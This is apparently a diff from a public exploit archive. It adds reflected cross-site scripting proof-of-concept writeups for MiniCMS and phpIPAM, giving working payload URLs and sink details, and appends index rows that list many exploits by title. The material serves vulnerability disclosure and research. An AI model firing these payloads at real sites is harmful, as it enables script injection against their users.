GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>
Details:
{ "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" }
[Replace Your Domain Name]

View file

@ -0,0 +1,27 @@
# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/phpipam/phpipam]
# Software Link: [https://github.com/phpipam/phpipam]
# Version: [1.5.1]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2023-24657]
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22
Details:
{
"Sink": "print @$_REQUEST['closeClass']",
"Vulnerable Variable": "closeClass",
"Source": "$_REQUEST['closeClass']",
"Sanitization Mechanisms Before Patch": "None",
"Sink Context Constraints": "Reflected within HTML attributes without escaping",
"Attack Payload": "\" onclick=\"alert(1)\"",
"Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
"Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
"Request Method": "GET",
"Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"
}
[Replace Your Domain Name]

View file

@ -10397,7 +10397,15 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52179,exploits/multiple/hardware/52179.txt,"ABB Cylon FLXeon 9.3.4 - Default Credentials",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52188,exploits/multiple/hardware/52188.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,,
52186,exploits/multiple/hardware/52186.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,,
52178,exploits/multiple/hardware/52178.txt,"ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48852,,,,,
52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,,
52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@ -10541,6 +10549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,,2001-03-03,,1,,,,,,
51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
@ -11808,6 +11817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50317,exploits/multiple/webapps/50317.txt,"Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)",2021-09-22,"Akıner Kısa",webapps,multiple,,2021-09-22,2021-09-22,0,CVE-2021-40868,,,,,
50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",2021-11-16,"Hosein Vita",webapps,multiple,,2021-11-16,2021-11-16,0,,,,,,
9727,exploits/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,webapps,multiple,,2009-09-20,,1,OSVDB-58292;CVE-2009-3326,,,,,
52181,exploits/multiple/webapps/52181.txt,"CMU CERT/CC VINCE 2.0.6 - Stored XSS",2025-04-11,LiquidWorm,webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
50185,exploits/multiple/webapps/50185.py,"Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection",2021-08-10,"Brian Ombongi",webapps,multiple,,2021-08-10,2021-08-10,0,CVE-2020-35848;CVE-2020-35847,,,,http://www.exploit-db.comcockpit-0.11.1.zip,
49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,,2021-01-08,2021-01-08,0,,,,,,
42610,exploits/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,webapps,multiple,,2017-09-04,2017-09-04,0,CVE-2017-13754,,,,,https://www.vulnerability-lab.com/get_content.php?id=2074
@ -11837,6 +11847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,,2012-02-08,2012-02-08,0,OSVDB-79326;CVE-2012-1047,,,,,https://www.vulnerability-lab.com/get_content.php?id=405
47063,exploits/multiple/webapps/47063.html,"CyberPanel 1.8.4 - Cross-Site Request Forgery",2019-07-01,"Bilgi Birikim Sistemleri",webapps,multiple,,2019-07-01,2019-07-03,0,,"Cross-Site Request Forgery (CSRF)",,,,
50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,,2021-08-27,2021-08-27,0,,,,,,
52172,exploits/multiple/webapps/52172.py,"CyberPanel 2.3.6 - Remote Code Execution (RCE)",2025-04-11,"Luka Petrovic (refr4g)",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51378,,,,,
50909,exploits/multiple/webapps/50909.txt,"Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31673,,,,,
50908,exploits/multiple/webapps/50908.txt,"Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31674,,,,,
43847,exploits/multiple/webapps/43847.py,"DarkComet (C2 Server) - File Upload",2018-01-15,"Pseudo Laboratories",webapps,multiple,,2018-01-21,2018-01-21,0,,Malware,,,,https://pseudolaboratories.github.io/DarkComet-upload-vulnerability/
@ -11933,6 +11944,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
52189,exploits/multiple/webapps/52189.txt,"GeoVision GV-ASManager 6.1.0.0 - Broken Access Control",2025-04-11,"Giorgi Dograshvili",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-56898,,,,,
52187,exploits/multiple/webapps/52187.txt,"GeoVision GV-ASManager 6.1.1.0 - CSRF",2025-04-11,"Giorgi Dograshvili",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-56901,,,,,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
@ -12065,6 +12078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
51847,exploits/multiple/webapps/51847.txt,"Magento ver. 2.4.6 - XSLT Server Side Injection",2024-03-03,tmrswrr,webapps,multiple,,2024-03-03,2024-03-03,0,,,,,,
52170,exploits/multiple/webapps/52170.txt,"MagnusSolution magnusbilling 7.3.0 - Command Injection",2025-04-11,CodeSecLab,webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2023-30258,,,,,
50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",2022-06-27,Vulnz,webapps,multiple,,2022-06-27,2022-06-27,0,,,,,,
9714,exploits/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",webapps,multiple,,2009-10-17,,1,OSVDB-58288;CVE-2009-3333,,,,,
39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple,,2016-01-14,2016-01-14,0,OSVDB-133027,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5291.php
@ -12121,6 +12135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
@ -12399,6 +12414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info
50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,,
49170,exploits/multiple/webapps/49170.txt,"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass",2020-12-02,"Aakash Madaan",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
52185,exploits/multiple/webapps/52185.txt,"WebFileSys 2.31.0 - Directory Path Traversal",2025-04-11,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-53586,,,,,
42106,exploits/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",webapps,multiple,,2017-06-01,2017-06-01,1,,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1197
42066,exploits/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple,,2017-05-25,2017-05-25,1,CVE-2017-2508,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1146
42065,exploits/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple,,2017-05-25,2017-05-25,1,,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1134
@ -18690,6 +18706,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
52166,exploits/php/webapps/52166.txt,"flatCore 1.5 - Cross Site Request Forgery (CSRF)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2019-13961,,,,,
52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@ -19343,6 +19360,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-26,1,CVE-2022-41544,,,,,
52168,exploits/php/webapps/52168.txt,"GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2021-28976,,,,,
4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@ -19436,6 +19454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17992,exploits/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php?PATH_INFO' SQL Injection",2011-10-17,flyh4t,webapps,php,,2011-10-17,2017-10-17,0,CVE-2011-4066;OSVDB-76614,,,,,
36973,exploits/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,webapps,php,,2012-03-20,2015-05-11,1,CVE-2012-4873;OSVDB-80217,,,,,https://www.securityfocus.com/bid/52622/info
39116,exploits/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",webapps,php,,2014-03-19,2015-12-29,1,CVE-2014-2339;OSVDB-104445,,,,,https://www.securityfocus.com/bid/66228/info
52167,exploits/php/webapps/52167.txt,"Gnuboard5 5.3.2.8 - SQL Injection",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2020-18662,,,,,
3876,exploits/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,webapps,php,,2007-05-07,,1,OSVDB-38256;CVE-2007-2609;OSVDB-38255;OSVDB-38254;OSVDB-38253;OSVDB-38252;OSVDB-38251;OSVDB-38250;OSVDB-38249;OSVDB-38248,,,,,
32207,exploits/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",webapps,php,80,2014-03-12,2014-03-12,1,OSVDB-104385;OSVDB-104384,,,,http://www.exploit-db.comgnupanel_lenny_squeeze_wheezy_precise_0.3.5_R4.tar.bz2,
30082,exploits/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,webapps,php,,2007-05-25,2013-12-06,1,CVE-2007-2879;OSVDB-38139,,,,,https://www.securityfocus.com/bid/24152/info
@ -22640,6 +22659,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40545,exploits/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,,2016-10-17,2016-10-19,0,,,,,http://www.exploit-db.comlms.zip,
45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,,2018-10-18,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comlwt_v_1_6_2.zip,
4680,exploits/php/webapps/4680.txt,"LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure",2007-11-29,GoLd_M,webapps,php,,2007-11-28,2016-10-20,1,OSVDB-39698;CVE-2007-6214,,,,http://www.exploit-db.comlearnloop2.0beta7.tar.gz,
52171,exploits/php/webapps/52171.txt,"LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection",2025-04-11,"Francisco Moraga (BTshell)",webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-8522,,,,,
23313,exploits/php/webapps/23313.txt,"Ledscripts LedForums - Multiple HTML Injections",2003-10-30,ProXy,webapps,php,,2003-10-30,2012-12-12,1,CVE-2003-1197;OSVDB-8934,,,,,https://www.securityfocus.com/bid/8934/info
38908,exploits/php/webapps/38908.txt,"Leed - 'id' SQL Injection",2013-12-18,"Alexandre Herzog",webapps,php,,2013-12-18,2015-12-08,1,CVE-2013-2627;OSVDB-101156,,,,,https://www.securityfocus.com/bid/64426/info
10930,exploits/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,webapps,php,,2010-01-01,,1,OSVDB-61472;CVE-2010-0980,,,,http://www.exploit-db.coml4d_stats_web.zip,
@ -23674,6 +23694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27125,exploits/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-24,2013-07-27,1,CVE-2006-0417;OSVDB-22729,,,,,https://www.securityfocus.com/bid/16367/info
2519,exploits/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,webapps,php,,2006-10-10,,1,OSVDB-29693;CVE-2006-5283,,,,,
18410,exploits/php/webapps/18410.txt,"MiniCMS 1.0/2.0 - PHP Code Injection",2012-01-22,Or4nG.M4N,webapps,php,,2012-01-22,2012-01-22,0,OSVDB-82331;OSVDB-82330;CVE-2012-5231,,,,,
52175,exploits/php/webapps/52175.txt,"MiniCMS 1.1 - Cross Site Scripting (XSS)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2018-1000638,,,,,
49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php,,2020-12-04,2020-12-04,0,,,,,,
44362,exploits/php/webapps/44362.html,"MiniCMS 1.10 - Cross-Site Request Forgery",2018-03-30,zixian,webapps,php,80,2018-03-30,2018-03-30,0,CVE-2018-9092,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comMiniCMS-1.10.tar.gz,
2796,exploits/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,webapps,php,,2006-11-16,,1,,,,,,
@ -24640,6 +24661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,,
46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,,2019-02-25,2019-02-25,0,,,,,,
23012,exploits/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,webapps,php,,2003-08-11,2012-11-29,1,,,,,,https://www.securityfocus.com/bid/8389/info
52174,exploits/php/webapps/52174.txt,"NEWS-BUZZ News Management System 1.0 - SQL Injection",2025-04-11,egsec,webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-10758,,,,,
3406,exploits/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php?sqllog' Remote File Inclusion",2007-03-04,bd0rk,webapps,php,,2007-03-03,2016-09-27,1,OSVDB-35355;CVE-2007-1340,,,,http://www.exploit-db.comletterman1.1.zip,
31447,exploits/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,webapps,php,,2008-03-20,2014-02-06,1,,,,,,https://www.securityfocus.com/bid/28353/info
26458,exploits/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,webapps,php,,2005-11-02,2013-06-26,1,CVE-2005-3469;OSVDB-20450,,,,,https://www.securityfocus.com/bid/15274/info
@ -27319,6 +27341,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47438,exploits/php/webapps/47438.py,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80,2019-09-30,2019-09-30,0,CVE-2019-16692,"SQL Injection (SQLi)",,,http://www.exploit-db.comphpipam-1.4.tar.gz,
50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",2022-01-25,"Rodolfo Tavares",webapps,php,,2022-01-25,2022-01-25,0,CVE-2022-23046,,,,,
50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,"Guilherme Alves",webapps,php,,2022-06-14,2022-06-14,0,,,,,,
52176,exploits/php/webapps/52176.txt,"phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2023-24657,,,,,
20278,exploits/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,webapps,php,,2000-10-07,2012-08-06,1,CVE-2000-0919;OSVDB-472,,,,,https://www.securityfocus.com/bid/1773/info
23558,exploits/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",webapps,php,,2004-01-20,2012-12-20,1,OSVDB-3745,,,,,https://www.securityfocus.com/bid/9458/info
48138,exploits/php/webapps/48138.txt,"PhpIX 2012 Professional - 'id' SQL Injection",2020-02-26,indoushka,webapps,php,,2020-02-26,2020-02-26,0,,,,,,
@ -29159,6 +29182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip,
